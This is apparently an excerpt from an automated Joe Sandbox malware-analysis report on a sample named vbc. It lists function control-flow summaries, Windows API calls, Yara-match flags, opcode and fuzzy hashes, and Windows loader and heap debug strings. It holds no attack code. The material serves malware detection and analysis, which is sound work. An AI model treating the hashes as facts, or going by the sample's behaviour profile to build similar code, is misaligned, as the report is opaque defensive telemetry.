                                                                                    • Not Executed
                                                                                    control_flow_graph 87 42c893-42c8cf call 404583 call 42daf3 NtClose
                                                                                    APIs
                                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C8CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: a6ce47e24ac997c0e1dd9abbf1fa8a3d5f959370d8a09260ef0fc3f9f560e904
                                                                                    • Instruction ID: 97d9e8b69870059a06d295f91f0edce4833e3d1a0b6e8778bec55b4e0ebf6405
                                                                                    • Opcode Fuzzy Hash: a6ce47e24ac997c0e1dd9abbf1fa8a3d5f959370d8a09260ef0fc3f9f560e904
                                                                                    • Instruction Fuzzy Hash: B2E04F322002147BD610AA5AEC41FD7779CDBC5714F004419FA08AB281C6B57A1087F4
                                                                                    Function 058C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 108 58c2df0-58c2dfc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f30365e1e9bc35a4e24ae96e359d7b203a8886acfd69e06a16fb025f22b4b847
                                                                                    • Instruction ID: db67e4128848989b241cdd49e8626ff94f0a8f68c45f640e459e4881cf6d8c6d
                                                                                    • Opcode Fuzzy Hash: f30365e1e9bc35a4e24ae96e359d7b203a8886acfd69e06a16fb025f22b4b847
                                                                                    • Instruction Fuzzy Hash: 1090023630141417D11171584544707416987D0241FD5C412A5428558D965A8E56A532
                                                                                    Function 058C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 107 58c2c70-58c2c7c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 72a99df36c718de746cf337525b294f2a222b5717937111247e765065ab064ad
                                                                                    • Instruction ID: 867e83a4f03ce1b7ba96ec95729a0441a3c7bc64c796b462ba01e72b6fb55bc4
                                                                                    • Opcode Fuzzy Hash: 72a99df36c718de746cf337525b294f2a222b5717937111247e765065ab064ad
                                                                                    • Instruction Fuzzy Hash: 0490023630149806D1107158844474A416587D0301F99C411A9428658D86998D957532
                                                                                    Function 058C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 106 58c2b60-58c2b6c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: d63f95620425f02c5e6df26f568058e082e53ba61a51900bcc1071fb964e0f1c
                                                                                    • Instruction ID: 73446c4c489d1277433f20241f6609e687b9107f13c1daa7ce8fd375b9d7429c
                                                                                    • Opcode Fuzzy Hash: d63f95620425f02c5e6df26f568058e082e53ba61a51900bcc1071fb964e0f1c
                                                                                    • Instruction Fuzzy Hash: B090026630241007410571584454616816A87E0201B95C021E6018590DC5298D956536
                                                                                    Function 058C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: cb4b9bbe71f0b8a24b18c3cd3b8d8d825946d15d6df3d4bd8fa0cbc0984bd3ba
                                                                                    • Instruction ID: 662e5180e74ef6da28ae27ee08d1d957d2fb5cd61008ec2f4ba2ef037962122a
                                                                                    • Opcode Fuzzy Hash: cb4b9bbe71f0b8a24b18c3cd3b8d8d825946d15d6df3d4bd8fa0cbc0984bd3ba
                                                                                    • Instruction Fuzzy Hash: B490023670551406D10071584554706516587D0201FA5C411A5428568D87998E5569B3
                                                                                    Function 004141D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(72Z53078,00000111,00000000,00000000), ref: 0041425A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 72Z53078$72Z53078
                                                                                    • API String ID: 1836367815-1643533592
                                                                                    • Opcode ID: 5c626eb4c4aa1a6981bfb54bef75fcda53ebc754134984ab69e00bc6286f52e7
                                                                                    • Instruction ID: d80221e1f92ecfeadebb637c57095649e674b75548d153b49727efd14be32985
                                                                                    • Opcode Fuzzy Hash: 5c626eb4c4aa1a6981bfb54bef75fcda53ebc754134984ab69e00bc6286f52e7
                                                                                    • Instruction Fuzzy Hash: 6E11E971D0025C7BEB11AAD59C81DEF7B7CEF81398F41806AF90067241D67C4E468BA5
                                                                                    Function 004141B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 15 4141b5-4141b6 16 414202-41424d call 42f423 call 417983 call 404533 call 424ff3 15->16 17 4141b8-4141d4 15->17 26 41426d-414273 16->26 27 41424f-41425e PostThreadMessageW 16->27 17->16 27->26 28 414260-41426a 27->28 28->26
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(72Z53078,00000111,00000000,00000000), ref: 0041425A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 72Z53078$72Z53078
                                                                                    • API String ID: 1836367815-1643533592
                                                                                    • Opcode ID: 4e899c09560dd295b4eea09373e7647fd71c7e42d236753f5ecbf53d49dfd37f
                                                                                    • Instruction ID: d97c7e81621f105e2d626c040259cc675ae84d4bd95fa8f473abb00c886a2f57
                                                                                    • Opcode Fuzzy Hash: 4e899c09560dd295b4eea09373e7647fd71c7e42d236753f5ecbf53d49dfd37f
                                                                                    • Instruction Fuzzy Hash: 6701F972E0515C779B1056D5AC41CEFB77CDFC1398B4180ABFD08A7200D57D4E468BA5
                                                                                    Function 004141E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 29 4141e3-4141f5 30 4141fd-41424d call 42f423 call 417983 call 404533 call 424ff3 29->30 31 4141f8 call 42ea13 29->31 41 41426d-414273 30->41 42 41424f-41425e PostThreadMessageW 30->42 31->30 42->41 43 414260-41426a 42->43 43->41
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(72Z53078,00000111,00000000,00000000), ref: 0041425A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 72Z53078$72Z53078
                                                                                    • API String ID: 1836367815-1643533592
                                                                                    • Opcode ID: c4552eebb31196f6cd9f473613f973db0c4a1c859779bfd7a2f9524f38007ed0
                                                                                    • Instruction ID: a90ec9ba706184b8e23d88f5e4a1604f18b8a3d9a5187ae4d770ddc4ed241e20
                                                                                    • Opcode Fuzzy Hash: c4552eebb31196f6cd9f473613f973db0c4a1c859779bfd7a2f9524f38007ed0
                                                                                    • Instruction Fuzzy Hash: 4001C4B2D0025C7ADB10AAE59C81DEF7B7CDF81798F41806AFA04B7241D67C5E468BA1
                                                                                    Function 0042CBD3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 77 42cbd3-42cc17 call 404583 call 42daf3 RtlAllocateHeap
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,0041E72E,?,?,00000000,?,0041E72E,?,?,?), ref: 0042CC12
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 15222f882391a6f1df90ded557e8b56f0e9c0d35b675ce76b94a4fce58941576
                                                                                    • Instruction ID: d487d3b03e5fd870cd6facd5e18d90f17e1e1b45fdd477a7ccf3870962209f68
                                                                                    • Opcode Fuzzy Hash: 15222f882391a6f1df90ded557e8b56f0e9c0d35b675ce76b94a4fce58941576
                                                                                    • Instruction Fuzzy Hash: 3CE06D71204214BBD714EF99EC41E9B77ACEFC9714F00441EFE08A7281D6B1BA1087B4
                                                                                    Function 0042CC23 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 82 42cc23-42cc67 call 404583 call 42daf3 RtlFreeHeap
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,74C08500,00000007,00000000,00000004,00000000,004171FB,000000F4), ref: 0042CC62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: a497164907bf5a419709db9d104f4aa982b6752a18a8ef3b78ce65f3c83b4e63
                                                                                    • Instruction ID: 894252dbb0f647bccd5e653401c2ed1b3d00a7f31d77e8cb3dec32718668ce0a
                                                                                    • Opcode Fuzzy Hash: a497164907bf5a419709db9d104f4aa982b6752a18a8ef3b78ce65f3c83b4e63
                                                                                    • Instruction Fuzzy Hash: 44E06D71604204BBD614EE99DC41FDB73ACEFC9710F004419FE08A7241D675B91087B8
                                                                                    Function 0042CC73 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 92 42cc73-42ccac call 404583 call 42daf3 ExitProcess
                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,9F81E24E,?,?,9F81E24E), ref: 0042CCA7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 621844428-0
                                                                                    • Opcode ID: 6abe8fe8e270cf54b7c5ef24c89b3e40668488ce21fc277eab50321fbf2677f2
                                                                                    • Instruction ID: 67f0569bf662432a7029b5887b41a7f8390ff6dec00b4f54c651a328d785fc56
                                                                                    • Opcode Fuzzy Hash: 6abe8fe8e270cf54b7c5ef24c89b3e40668488ce21fc277eab50321fbf2677f2
                                                                                    • Instruction Fuzzy Hash: 0FE046362002147BD620AA5ADC41F9B776CEBC5724F00445AFA08A7281CAB5BA0487B4
                                                                                    Function 00417A50 Relevance: 1.5, APIs: 1, Instructions: 24libraryloaderCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 97 417a50-417a51 98 417a53-417a56 97->98 99 4179d8-4179e1 97->99 100 4179e3-4179f7 LdrLoadDll 99->100 101 4179fa-4179fd 99->101 100->101
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: dde08397e3d1080f24d77cc6b00d527da95b6d712252c6e7d203f8619dc81514
                                                                                    • Instruction ID: 3fde030f9168f7bec8c36b4ed3deb21c83c409ac85ce74226c2ab029a14b000e
                                                                                    • Opcode Fuzzy Hash: dde08397e3d1080f24d77cc6b00d527da95b6d712252c6e7d203f8619dc81514
                                                                                    • Instruction Fuzzy Hash: EFE0D875A5410AAFDB10CFC4CC81FDDB778EB04614F0083C7D5289B2C1E234AA4A8781
                                                                                    Function 058C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 102 58c2c0a-58c2c0f 103 58c2c1f-58c2c26 LdrInitializeThunk 102->103 104 58c2c11-58c2c18 102->104
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 35cd4e2740dc5fa1e9b7b1cb2cb5186cded2ebc32dc949148df334e76b4616da
                                                                                    • Instruction ID: 48e7bb2212e0fce83b3dc7d7a253c086e42e857c9a45ce1a6d685fb021b1d4af
                                                                                    • Opcode Fuzzy Hash: 35cd4e2740dc5fa1e9b7b1cb2cb5186cded2ebc32dc949148df334e76b4616da
                                                                                    • Instruction Fuzzy Hash: E4B02B329014C0C9DA00F3204608B177E1077C0300F15C061D3034241E033CC4C0E172

                                                                                    Non-executed Functions

                                                                                    Function 05938D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • a NULL pointer, xrefs: 05938F90
                                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 05938F3F
                                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 05938E3F
                                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 05938F26
                                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 05938DC4
                                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 05938DB5
                                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 05938FEF
                                                                                    • *** then kb to get the faulting stack, xrefs: 05938FCC
                                                                                    • an invalid address, %p, xrefs: 05938F7F
                                                                                    • The critical section is owned by thread %p., xrefs: 05938E69
                                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 05938E02
                                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 05938E86
                                                                                    • The resource is owned exclusively by thread %p, xrefs: 05938E24
                                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 05938DA3
                                                                                    • write to, xrefs: 05938F56
                                                                                    • read from, xrefs: 05938F5D, 05938F62
                                                                                    • *** enter .cxr %p for the context, xrefs: 05938FBD
                                                                                    • This failed because of error %Ix., xrefs: 05938EF6
                                                                                    • The instruction at %p tried to %s , xrefs: 05938F66
                                                                                    • The resource is owned shared by %d threads, xrefs: 05938E2E
                                                                                    • *** enter .exr %p for the exception record, xrefs: 05938FA1
                                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 05938F34
                                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 05938E4B
                                                                                    • *** Inpage error in %ws:%s, xrefs: 05938EC8
                                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 05938F2D
                                                                                    • The instruction at %p referenced memory at %p., xrefs: 05938EE2
                                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 05938DD3
                                                                                    • <unknown>, xrefs: 05938D2E, 05938D81, 05938E00, 05938E49, 05938EC7, 05938F3E
                                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 05938D8C
                                                                                    • Go determine why that thread has not released the critical section., xrefs: 05938E75
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                    • API String ID: 0-108210295
                                                                                    • Opcode ID: ed6a4a135af9dbd8a81df9aa5aec8c96b5ea2db3cd4f877fc765e1c242122e4c
                                                                                    • Instruction ID: f65f8deebab5d597ff6bbbd5da07d2e8702c325a240aa9f8046c0ead2f713d88
                                                                                    • Opcode Fuzzy Hash: ed6a4a135af9dbd8a81df9aa5aec8c96b5ea2db3cd4f877fc765e1c242122e4c
                                                                                    • Instruction Fuzzy Hash: 4A810875745214FFCB21EB188C4AD7B3BBAEF86B10F050844F505AF252E775D901E6A2
                                                                                    Function 05902349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-2160512332
                                                                                    • Opcode ID: a037e150bebe1520772ccdaa6d5c68220952fbc88cbf36117e7e3da1c11cb9ff
                                                                                    • Instruction ID: a6897c3f9f71ae069abf8af8876f75f805f9698e853097ceaf902e8d150f773d
                                                                                    • Opcode Fuzzy Hash: a037e150bebe1520772ccdaa6d5c68220952fbc88cbf36117e7e3da1c11cb9ff
                                                                                    • Instruction Fuzzy Hash: 3D928B79608745AFEB21CF24C888B6BB7E9BB84710F045C2DFA95D7290D770E844CB92
                                                                                    Function 058B8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Critical section debug info address, xrefs: 058F541F, 058F552E
                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058F54E2
                                                                                    • Thread identifier, xrefs: 058F553A
                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058F54CE
                                                                                    • Critical section address, xrefs: 058F5425, 058F54BC, 058F5534
                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058F540A, 058F5496, 058F5519
                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 058F5543
                                                                                    • corrupted critical section, xrefs: 058F54C2
                                                                                    • undeleted critical section in freed memory, xrefs: 058F542B
                                                                                    • 8, xrefs: 058F52E3
                                                                                    • double initialized or corrupted critical section, xrefs: 058F5508
                                                                                    • Critical section address., xrefs: 058F5502
                                                                                    • Invalid debug info address of this critical section, xrefs: 058F54B6
                                                                                    • Address of the debug info found in the active list., xrefs: 058F54AE, 058F54FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                    • API String ID: 0-2368682639
                                                                                    • Opcode ID: 83778820685a3f389a110ab20fbef56d291045a9d736291f93255c6c4dec7d15
                                                                                    • Instruction ID: b4b213a678036ca958917c1c1c0fe55844650c3300ed039f4dfed1d768a36faa
                                                                                    • Opcode Fuzzy Hash: 83778820685a3f389a110ab20fbef56d291045a9d736291f93255c6c4dec7d15
                                                                                    • Instruction Fuzzy Hash: BA816AB1A40348AFDB20CF99C945BAEBBF9BB48714F10411AEA09F7240D3B5AD40DF60
                                                                                    Function 0589AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                    • API String ID: 0-3197712848
                                                                                    • Opcode ID: 4dc28010cdea65d37e4a272cf52f359fe42f36f89f4ccee0aa7acb19115cf6a5
                                                                                    • Instruction ID: 40fef4b8cee59c9e834a0637089553f542e24b2e0db62614569b427ab3808fa4
                                                                                    • Opcode Fuzzy Hash: 4dc28010cdea65d37e4a272cf52f359fe42f36f89f4ccee0aa7acb19115cf6a5
                                                                                    • Instruction Fuzzy Hash: 8B12C0716083458BDB28DB28C845BBAB7E6BF85718F08491EFD85DB290EB34DD44CB52
                                                                                    Function 05930CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                    • API String ID: 0-1357697941
                                                                                    • Opcode ID: 9f54aa75196810091ff862811ddcf459aeb9cbbee16ec25dd8e49d6e5e7e4395
                                                                                    • Instruction ID: 6fc73b1ed97b15453bbb94182a9a8d2663c252015d7269756c8f6a0f11bcdfae
                                                                                    • Opcode Fuzzy Hash: 9f54aa75196810091ff862811ddcf459aeb9cbbee16ec25dd8e49d6e5e7e4395
                                                                                    • Instruction Fuzzy Hash: EFF11131A04249EFCB25CF68C44ABBAB7FAFF09310F088459E896DB251D734E945DB51
                                                                                    Function 05930274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                    • API String ID: 0-1700792311
                                                                                    • Opcode ID: 107af1e69fdfbd22b714b03c5e1693110903dffb884ae13f208a9f6b31c6e988
                                                                                    • Instruction ID: f81e83c54befc21547dd2a0780b3b46ccd6e1f0538ebca4b9b84a0cfe33c9db2
                                                                                    • Opcode Fuzzy Hash: 107af1e69fdfbd22b714b03c5e1693110903dffb884ae13f208a9f6b31c6e988
                                                                                    • Instruction Fuzzy Hash: A9D10F31604789DFCB12DF68C84AAADBBF6FF49714F088459E84A9B252EB34DD41CB11
                                                                                    Function 058B2F98 Relevance: 9.1, Strings: 7, Instructions: 307COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 058F28B2
                                                                                    • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 058F2881
                                                                                    • @, xrefs: 058B3180
